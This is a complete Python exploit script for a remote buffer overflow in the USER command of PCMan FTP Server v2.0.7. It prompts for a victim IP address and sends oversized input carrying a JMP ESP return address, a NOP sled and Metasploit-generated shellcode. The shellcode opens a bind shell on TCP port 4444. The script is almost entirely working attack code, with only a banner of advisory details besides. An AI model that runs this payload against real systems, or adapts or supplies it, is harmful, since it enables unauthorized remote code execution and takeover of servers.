#!/usr/bin/env python
 
import signal
from time import sleep
from socket import *
from sys import exit, exc_info
 
def sigHandle(signum, frm): # Signal handler
     
    print "\n[!!!] Cleaning up the exploit... [!!!]\n"
    sleep(1)
    exit(0)
 
 
def targServer():
     
    while True:    
        try:
            server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the PCMan FTP Server:\n\n>"))
            server = inet_ntoa(server)
            break
        except:
            print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n"
            sleep(1)
            continue
             
    return server   
 
 
def main():
       
    print ("""\n [*] Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command
 [*] Discovered and Reported******June 2013 
 [*] Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
 [*] Exploit/Advisory*************http://infosec42.blogspot.com/
 [*] Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21)
 [*] Tested Commands*************USER (Other commands were not tested and may be vulnerable) 
 [*] CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending""")
    signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c
    victim = targServer()
    port = int(21)
    Cmd = "USER " #Vulnerable command
    JuNk = "\x42" * 2004
    # KERNEL32.dll 7CA58265 - JMP ESP
    ret = "\x65\x82\xA5\x7C"   
    NOP = "\x90" * 50
 
    #348 Bytes Bind Shell Port TCP/4444
    # msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -c 1 -b "\x0d\x0a\x00\xf1" R
    shelcode = "\xd9\xeb\xbf\xf8\x6d\xc1\x4f\xd9\x74\x24\xf4\x5d\x2b\xc9" +\
    "\xb1\x56\x83\xed\xfc\x31\x7d\x14\x03\x7d\xec\x8f\x34\xb3" +\
    "\xe4\xd9\xb7\x4c\xf4\xb9\x3e\xa9\xc5\xeb\x25\xb9\x77\x3c" +\
    "\x2d\xef\x7b\xb7\x63\x04\x08\xb5\xab\x2b\xb9\x70\x8a\x02" +\
    "\x3a\xb5\x12\xc8\xf8\xd7\xee\x13\x2c\x38\xce\xdb\x21\x39" +\
    "\x17\x01\xc9\x6b\xc0\x4d\x7b\x9c\x65\x13\x47\x9d\xa9\x1f" +\
    "\xf7\xe5\xcc\xe0\x83\x5f\xce\x30\x3b\xeb\x98\xa8\x30\xb3" +\
    "\x38\xc8\x95\xa7\x05\x83\x92\x1c\xfd\x12\x72\x6d\xfe\x24" +\
    "\xba\x22\xc1\x88\x37\x3a\x05\x2e\xa7\x49\x7d\x4c\x5a\x4a" +\
    "\x46\x2e\x80\xdf\x5b\x88\x43\x47\xb8\x28\x80\x1e\x4b\x26" +\
    "\x6d\x54\x13\x2b\x70\xb9\x2f\x57\xf9\x3c\xe0\xd1\xb9\x1a" +\
    "\x24\xb9\x1a\x02\x7d\x67\xcd\x3b\x9d\xcf\xb2\x99\xd5\xe2" +\
    "\xa7\x98\xb7\x6a\x04\x97\x47\x6b\x02\xa0\x34\x59\x8d\x1a" +\
    "\xd3\xd1\x46\x85\x24\x15\x7d\x71\xba\xe8\x7d\x82\x92\x2e" +\
    "\x29\xd2\x8c\x87\x51\xb9\x4c\x27\x84\x6e\x1d\x87\x76\xcf" +\
    "\xcd\x67\x26\xa7\x07\x68\x19\xd7\x27\xa2\x2c\xdf\xe9\x96" +\
    "\x7d\x88\x0b\x29\x90\x14\x85\xcf\xf8\xb4\xc3\x58\x94\x76" +\
    "\x30\x51\x03\x88\x12\xcd\x9c\x1e\x2a\x1b\x1a\x20\xab\x09" +\
    "\x09\x8d\x03\xda\xd9\xdd\x97\xfb\xde\xcb\xbf\x72\xe7\x9c" +\
    "\x4a\xeb\xaa\x3d\x4a\x26\x5c\xdd\xd9\xad\x9c\xa8\xc1\x79" +\
    "\xcb\xfd\x34\x70\x99\x13\x6e\x2a\xbf\xe9\xf6\x15\x7b\x36" +\
    "\xcb\x98\x82\xbb\x77\xbf\x94\x05\x77\xfb\xc0\xd9\x2e\x55" +\
    "\xbe\x9f\x98\x17\x68\x76\x76\xfe\xfc\x0f\xb4\xc1\x7a\x10" +\
    "\x91\xb7\x62\xa1\x4c\x8e\x9d\x0e\x19\x06\xe6\x72\xb9\xe9" +\
    "\x3d\x37\xd9\x0b\x97\x42\x72\x92\x72\xef\x1f\x25\xa9\x2c" +\
    "\x26\xa6\x5b\xcd\xdd\xb6\x2e\xc8\x9a\x70\xc3\xa0\xb3\x14" +\
    "\xe3\x17\xb3\x3c"

    sploit = Cmd + JuNk + ret + NOP + shelcode
    sploit += "\x42" * (2992 - len(NOP + shelcode)) + "\r\n"
 
    try:
        print "\n [*] Creating network socket."
        net_sock = socket(AF_INET, SOCK_STREAM)
    except:
        print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info()       
        sleep(1)
        exit(0)    
 
    try:
        print " [*] Connecting to PCMan FTP Server @ %s on port TCP/%d." % (victim, port)
        net_sock.connect((victim, port))
    except:
        print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info())
        sleep(1)
        exit(0)
  
    try:
        print """ [*] Attempting to exploit the FTP USER command.
 [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.
 [*] Payload Length: %d bytes.""" % (victim, port, len(sploit))
        net_sock.send(sploit)
        sleep(1)
    except:
        print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info())
        sleep(1)
        exit(0)
 
    try:
        print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
 [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n"""
        net_sock.close()
    except:
        print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info()
        sleep(1)
        exit(0)
 
 
if __name__ == "__main__":
    main()